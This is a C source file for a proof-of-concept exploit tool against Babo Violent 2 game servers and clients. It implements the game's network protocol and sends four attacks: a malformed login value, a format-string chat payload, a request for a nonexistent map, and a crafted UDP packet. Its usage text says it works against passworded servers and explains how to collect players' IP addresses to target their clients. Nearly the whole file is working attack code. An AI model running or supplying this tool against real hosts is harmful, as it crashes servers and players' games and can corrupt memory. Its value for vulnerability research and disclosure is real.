/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define waitms  sleep
    #define ONESEC  1000
    typedef uint32_t    in_addr_t;
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/times.h>

    #define waitms(x)   usleep(x * 1000);
    #define ONESEC  1
#endif



#define VER         "0.1"
#define BUFFSZ      0xffff      // max supported
#define PORT        3333

#define PASSWORD    ""          // not needed



#define DO_JOIN     1
#define DO_ALL      2



typedef struct {
    uint16_t    size;
    uint16_t    type;
    uint8_t     *data;
} bv2_pck_t;



void printmsg(uint8_t *data);
void bv2_udp_crash(struct sockaddr_in *peer);
u_char *rnds(u_char *data, int len, u_int *seed);
int bv2_send(int sd, uint16_t rnd, ...);
bv2_pck_t **bv2_recv(int sd, uint16_t *rnd);
void bv2_free(bv2_pck_t **pck);
int tcp_send(int sd, uint8_t *data, int size);
int tcp_recv(int sd, uint8_t *data, int size);
int timeout(int sock);
in_addr_t resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    bv2_pck_t   **pck;
    u_int       seed;
    int         sd,
                i,
                rc,
                rn,
                attack,
                state;
    uint16_t    port    = PORT,
                *rnd;
    uint8_t     user[0x45],
                pass[0x11],
                *buff   = NULL;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Babo Violent 2 <= 2.08.00 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = crash through malformed value\n"
            " 2 = format string\n"
            " 3 = unexistent map crash\n"
            " 4 = server or client crash trough malformed UDP packet, please specify port\n"
            "     11111 if you want to test a client, when you are in a Babo server you can\n"
            "     use the playerlist command for retrieving the full list of usernames and\n"
            "     their IP addresses\n"
            "\n"
            "Note: this tool works versus passworded servers without knowing the keyword.\n"
            "      if the server doesn't crash the first time, relaunch it again\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);
    if(argc > 3) port = atoi(argv[3]);

    printf("- resolv %s", argv[2]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    printf(" -> %s:%hu\n", inet_ntoa(peer.sin_addr), port);

    if(attack == 4) {
        if(port != 11111) {
            printf("\nAlert: you have not specified the port 11111! I try to continue\n");
        }

        printf("- send malformed UDP packet\n");

        bv2_udp_crash(&peer);

        printf("- done\n");
        return(0);
    }

    seed = time(NULL);

    printf("- connect...");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf("ok\n");

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(tcp_recv(sd, buff, 37) < 0) goto quit;
    printf("- server hash: %.28s\n", buff + 5);

    rc      = 0;    // rc is the current RAND1 number in use by us
    rn      = 0;    // rn is RAND1 number in use by the server
    state   = 0;    // the current state used for joining, admin and commands

    rnd = calloc(sizeof(uint16_t), BUFFSZ);
    if(!rnd) std_err();

    for(;;) {
        pck = NULL;
        if(!timeout(sd)) {
            pck = bv2_recv(sd, &rnd[rn]);
            if(!pck) goto quit;
            rn++;

            for(i = 0; pck[i]; i++) {
                switch(pck[i]->type) {
                    case 0x7e: {
                        printf("%s\n", pck[i]->data);
                        } break;
                    case 0xca: {
                        printmsg(pck[i]->data + 1);
                        } break;
                    case 0x74: {
                        if(state != DO_JOIN) {
                            printf("- ready for joining\n");
                            state = DO_JOIN;
                        }
                        } break;
                    case 0xc9: {
                        state = DO_ALL;
                        } break;
                    case 0x6a: {
                        if(bv2_send(sd, rnd[rc++],
                            pck[i]->size, 0x01, pck[i]->data,
                            NULL, NULL, NULL) < 0) goto quit;
                        } break;
                    default: {
                        // printf("%02x ", pck[i]->type);
                        } break;
                }
            }

            bv2_free(pck);
        }

        if(state == DO_JOIN) {                          // login
            printf("- send join\n");

            user[0] = 0;                                // sometimes is used 0x07 too
            if(attack == 1) user[0] = 0xff;             // the following seems useless
            memset(user + 1, 0, 16);

            strncpy(user + 1 + 16,                      // username
                rnds(buff, 32, &seed),
                32);
            strncpy(user + 1 + 16 + 32,                 // mac address?
                "00-53-45-00-00-00",
                20);

            pass[0] = 0;
            if(attack == 1) pass[0] = 0xff;
            strncpy(pass + 1,                           // password
                PASSWORD,
                16);

            if(bv2_send(sd, rnd[rc++],
                sizeof(user), 0xc9, user,
                sizeof(pass), 0x04, pass,
                NULL, NULL, NULL) < 0) goto quit;

            state = 0;
        }

        if(state != DO_ALL) continue;

        if(attack == 2) {
            printf("- send message\n");

            buff[0] = 0xfe;
            buff[1] = 0x08;
            rnds(buff + 2, 128, &seed);
            strcpy(buff + 2, "%n%n%n%n%n%s%s");

            if(bv2_send(sd, rnd[rc++],
                0x83, 0xca, buff,
                NULL, NULL, NULL) < 0) goto quit;

            state = 0;
        }

        if(attack == 3) {
            printf("- send map\n");

            rnds(buff, 0x14, &seed);

            if(bv2_send(sd, rnd[rc++],
                0x14, 0xd1, buff,
                NULL, NULL, NULL) < 0) goto quit;

            state = 0;
        }
    }

quit:
    printf("- connection lost, try to relaunch this tool again\n");
    close(sd);
    free(buff);
    return(0);
}



void printmsg(uint8_t *data) {
    int         i;
    uint8_t     buff[512],
                *p;

    i = 0;
    for(p = data; *p && (i < sizeof(buff)); p++) {
        if(*p >= ' ') buff[i++] = *p;
    }
    buff[i] = 0;
    printf("%s\n", buff);
}



void bv2_udp_crash(struct sockaddr_in *peer) {
    int         sd;
    uint8_t     buff[21];

    *(uint8_t  *)(buff)     = 1;
    *(uint32_t *)(buff + 1) = 0;
    *(uint16_t *)(buff + 5) = 0x012d;
    *(uint16_t *)(buff + 7) = 0xffff;
    memcpy(buff + 9, "333313333\0=", 12);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    sendto(sd, buff, 21, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in));
    close(sd);
}



u_char *rnds(u_char *data, int len, u_int *seed) {
    u_int   rnd;
    u_char  *p = data;
    static const u_char table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    rnd = *seed;
    len = rnd % len;
    if(len < 3) len = 3;

    while(len--) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        rnd >>= 3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(data);
}



int bv2_send(int sd, uint16_t rnd, ...) {
    va_list     ap;
    int         num,
                i,
                len;
    uint16_t    size,
                type;
    uint8_t     *buff,
                *data,
                *p;

    len = 8 + 1;

    va_start(ap, rnd);
    for(num = 0; ; num++) {
        size = va_arg(ap, int);
        type = va_arg(ap, int);
        if(!va_arg(ap, uint8_t *)) break;
        len += 2 + 2 + size;
    }
    va_end(ap);

    buff = malloc(len);
    if(!buff) std_err();

    sprintf(buff, "RND1%04x", rnd);
    buff[8] = num;
    p = buff + 9;

    va_start(ap, rnd);
    for(i = 0; i < num; i++) {
        size = va_arg(ap, int);
        type = va_arg(ap, int);
        data = va_arg(ap, uint8_t *);

        *(uint16_t *)p = size;  p += 2;
        *(uint16_t *)p = type;  p += 2;
        memcpy(p, data, size);  p += size;
    }
    va_end(ap);

    if(tcp_send(sd, buff, len) < 0) {
        free(buff);
        return(-1);
    }
    free(buff);
    return(0);
}



bv2_pck_t **bv2_recv(int sd, uint16_t *rnd) {
    int         num,
                i;
    bv2_pck_t   **pck;
    uint8_t     buff[16];

    if(tcp_recv(sd, buff, 9) < 0) return(NULL);
    if(memcmp(buff, "RND1", 4)) return(NULL);
    sscanf(buff + 4, "%04hx", rnd);

    num = buff[8];
    pck = calloc(num + 1, sizeof(uint8_t *));
    if(!pck) return(NULL);

    for(i = 0; i < num; i++) {
        if(tcp_recv(sd, buff, 4) < 0) return(NULL);

        pck[i] = malloc(sizeof(bv2_pck_t));
        if(!pck[i]) return(NULL);

        pck[i]->size = *(uint16_t *)(buff);
        pck[i]->type = *(uint16_t *)(buff + 2);
        pck[i]->data = malloc(pck[i]->size);
        if(!pck[i]->data) return(NULL);

        if(tcp_recv(sd, pck[i]->data, pck[i]->size) < 0) return(NULL);
    }

    return(pck);
}



void bv2_free(bv2_pck_t **pck) {
    int     i;

    if(!pck) return;
    for(i = 0; pck[i]; i++) {
        if(pck[i]->data) free(pck[i]->data);
        free(pck[i]);
    }
    free(pck);
}



int tcp_send(int sd, uint8_t *data, int size) {
    if(send(sd, data, size, 0) != size) return(-1);
    return(0);
}



int tcp_recv(int sd, uint8_t *data, int size) {
    int     t;

    while(size) {
        t = recv(sd, data, size, 0);
        if(t <= 0) return(-1);
        data += t;
        size -= t;
    }
    return(0);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = 0;
    tout.tv_usec = 10000;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



in_addr_t resolv(char *host) {
    struct      hostent *hp;
    in_addr_t   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n",
                host);
            exit(1);
        } else host_ip = *(in_addr_t *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

